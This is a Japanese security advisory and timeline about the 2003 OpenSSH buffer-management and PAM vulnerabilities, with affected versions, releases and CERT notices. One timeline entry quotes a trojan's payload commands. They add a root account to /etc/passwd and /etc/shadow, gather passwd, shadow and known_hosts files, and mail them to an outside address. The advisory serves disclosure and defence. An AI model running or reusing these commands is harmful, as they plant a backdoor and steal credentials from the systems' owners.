公開日:2003.09.17 8:25 最終更新日:2003.09.30 9:20

TRCA-2003-24
OpenSSH のバッファ管理機構に脆弱性

概要


OpenBSD Project が提供している OpenSSH のバッファ管理機構に遠隔から侵害可能な脆弱性が確認されました。
脆弱性は、ヒープメモリに影響を与えるものであり、結果として、サービス運用妨害 (denial-of-service, DoS) 攻撃を受けたり、第三者が sshd プロセスの権限 (通常、管理者権限) で任意のコードを実行する可能性があります。

影響を受けるシステム
 - OpenSSH 3.7 ならびにそれ以前
 - 脆弱な OpenSSH のバージョンに由来するプログラム

なお、2003 年 9 月 24 日(水) 時点での最新版は以下のバージョンです。
 - Original Version: 3.7.1
 - Portable Version: 3.7.1p2

時系列イベント


日時 (JST)内容
2003-09-16 01:02Full-Disclosure に "new ssh exploit?" (ssh の新たな脆弱性の存在有無に関する問合せ) が投稿される
#Post-Date: Mon, 15 Sep 2003 12:02:39 -0400
2003-09-16 08:31Full-Disclosure に "openssh remote exploit" (openssh の脆弱性に関する指摘) が投稿される
#Post-Date: Mon, 15 Sep 2003 16:31:56 -0700
2003-09-16 13:56OpenSSH openssh-3.7.tgz, openssh-3.7p1.tgz をリリース
2003-09-16 21:32OpenSSH OpenSSH Security Advisory: buffer.adv 第 1 版 (RCS file: buffer.c,v) を openbsd-announce に投稿 ならびに Web 公開
#Affected-Version: OpenSSH 3.7 より以前
#Post-Date: 2003-09-16 12:32:12
2003-09-17 01:25OpenSSH openssh-3.7.1.tgz, openssh-3.7.1p1.tgz をリリース
2003-09-17 06:53First メーリングリスト経由で CA-2003-24 が届く
#Affected-Version: OpenSSH 3.7 より以前
#Post-Date: Wed, 17 Sep 2003 06:42:15 JST
2003-09-17 08:06CERT メーリングリスト経由で CA-2003-24 が届く
#Affected-Version: OpenSSH 3.7 より以前
#Post-Date: Wed, 17 Sep 2003 06:44:27 JST
2003-09-17 08:13OpenSSH OpenSSH Security Advisory: buffer.adv 第 2 版 (RCS file: buffer.c,v channels.c,v) を openbsd-announce に投稿 ならびに Web 公開
#Affected-Version: OpenSSH 3.7.1 より以前
#Post-Date: 2003-09-16 23:13:05
2003-09-17 09:15JPCERT メーリングリスト経由で CA-2003-24 の FYI が届く
#Post-Date: Wed, 17 Sep 2003 09:00:01 JST
2003-09-17 13:37ISSKK OpenSSH メモリ破損の脆弱性 を Web 公開
#Last-Modified: Wed, 17 Sep 2003 04:37:22 GMT
2003-09-17 CERT CA-2003-24 第 2 版 を Web 公開
#Affected-Version: OpenSSH 3.7.1 より以前
2003-09-19 07:11Full-Disclosure に "new openssh exploit in the wild!" (remote openssh buffer management sploit を装ったトロイの木馬 theosshucksass.c) に関する情報が投稿される
以下に示す操作を実施します。
printf("[*] sending shellcode\n")= 22
popen("(
 echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; 
 echo "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:99999:7:::" >> /etc/shadow; 
 /sbin/ifconfig -a >/tmp/.tmp;
 cat /etc/passwd /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
 find /home -name known_hosts -exec cat {} >> /tmp/.tmp;
 cat /tmp/.tmp | /usr/sbin/sendmail -f ownage@gmx.de m0nkeyhack@supermarkt.de
) &> /dev/null; 
rm -f /tmp/.tmp;", "r") = 0x0804a6b0
2003-09-23 14:49OpenSSH openssh-3.7.1p2.tgz をリリース
2003-09-23 (米国日付)CERT/CC OpenSSH の "Pluggable Authentication Modules (PAM)" の脆弱性に関する VU#209807, VU#602204 を Web 公開
2003-09-23 21:39OpenSSH Portable OpenSSH 3.7.1p2 released を openbsd-announce に投稿 ならびに Web 公開
Portable OpenSSH version 3.7p1 and 3.7.1p1 contain multiple vulnerabilities in the new PAM authentication code. At least one of these bugs is remotely exploitable (under a non-standard configuration, with privsep disabled). ということで、VU#333628(CAN-2003-0693) とは異なる脆弱性です。

#Post-Date: 2003-09-23 12:39:50
2003-09-30 08:08CERT メーリングリスト経由で "CERT Advisory Notice: Clarifications regarding recent vulnerabilities in OpenSSH (OpenSSH に 3つの脆弱性 VU#333628, VU#209807, VU#602204 が報告されていることに関する注意喚起)" が届く
#Post-Date: Tue, 30 Sep 2003 07:25:36 JST

参考情報


  1. CERT Advisory CA-2003-24
    Buffer Management Vulnerability in OpenSSH
  2. Vendor Status Note JVNCA-2003-24
    OpenSSH のバッファ管理機構に脆弱性